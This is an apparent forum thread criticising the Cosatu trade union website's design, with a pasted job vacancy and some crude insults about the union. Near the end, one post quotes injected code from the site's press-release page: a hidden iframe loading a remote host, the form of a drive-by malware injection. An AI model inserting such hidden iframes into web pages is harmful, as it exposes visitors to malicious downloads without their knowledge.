Cosatu website a disaster

The Cosatu website epitomizes poor web design, with color combinations like red and yellow, and flashing buttons which have disappeared from mainstream web design years ago. The website also does not have any consistent layout and navigation.

flashing? spinning, yes.

looks doff.

needs an overhaul ASAP.

TIAL'll have a party with the viruses on this site :D
 
Their vacancy link works.
looks like a cool job. :)

Job Description
The main responsibility is to implement national education and organizing programmes • Compile
education inputs, deliver education programmes either discussed in the Province or decided upon by
head office • Organizing aspects in implementing material campaigns, organising programmes such as
recruitment, service locals and coordinate Affiliates Organizers/Educators at Provincial level.
Functions include:
• Servicing locals which includes launching and establishing new locals, liaising with the locals on
activities and providing advice;
• Conducting and facilitating education for the Affiliates and locals;
• Coordinate campaigns and organizational activities e.g. May day;
• Coordinating subcommittees such as Provincial Educators Forum, Organisers Forum;
• Monitor the implementation of COSATU Programmes in the Province;
• Assist workers who need advice;
• Assist the Provincial Secretary where required
Requirements
• Matric with a minimum of 5 years experience in Trade Union work or work in a non Governmental
Organisation or an equivalent job
• A valid drivers license
• A good understanding of South African Labour Laws
• Good administrative skills
• Good communication, organizing and negotiation skills
• Be computer literate
The Congress of South African Trade Unions has vacant positions
of the Provincial Educator/Organisers in the following Provinces:
COSATU Northern Cape – Kimberley
COSATU Limpopo – Polokwane
COSATU KwaZulu Natal - Durban
All applications should be sent before the 29th May 2009
with detailed CV and contactable references to:
The COSATU General Secretary
Fax: 011 339 6940 or 011 339 4080
Tel: 011 339 4911
Email: [email protected]
 
Their vacancy link works.
looks like a cool job. :)

Eish .... have u ever sat in meetings with a trade union and their reps ??
GOD its the most frustrating load of bull you will have ever heard! Been there done that, wanted to strangle myself with the T-shirt :sick:
 
"Cosatu was asked for feedback about their website, but did not respond by the time of publication."

what did you expect...they cant even run their own website correctly, and yet when others make a success of things they want to go boycotting ha ha ha, what a bunch of idiots, i cant believe people actually pay these idiots money to represent them, i think in that case im gonna open up my own union and charge half the price with 110% guaranteed same service as these fools, plus a better web page lol
 
I don't know what you are complaining about. Its got Zuma's face on it. Theres no cause for concern.
 
WTF?? DOcuments and Settings......

<BODY
background="file:///C|/Documents%20and%20Settings/NANDIPHA/My%20Documents/New%20Website/%3Cimg%20src="../cong2003/backgd.jpg">
 
well no surprise there, most of these sites are about as userfriendly like a hole in the head by uzi from close range
 
well two things are clear here:

1) Showerhead Zuma has disco lights to dance to.
2) The site need ARV, it is infected
 
Another bit of use. I actually risked it and clicked on the audio link on the left bar, expecting my ears to be damaged like my eyes, all that happened was a page cannot be displayed error. Thank sh1ts for that.

Amazingly, the disclaimer has the same error.
 
That site looks like the samples provided with NT4 Personal Web Server :-)

No doubt it's a template, impossible for the designer to have actually scripted a working css or html page by themselves.
 
I couldnt find the virus. Where?

In the press releases like http://www.cosatu.org.za/press/2009/may.htm (don't go there in IE :) )has the following code:

<iframe src="http://jL.chura.pl/rc/" style="display:none"></iframe>
 
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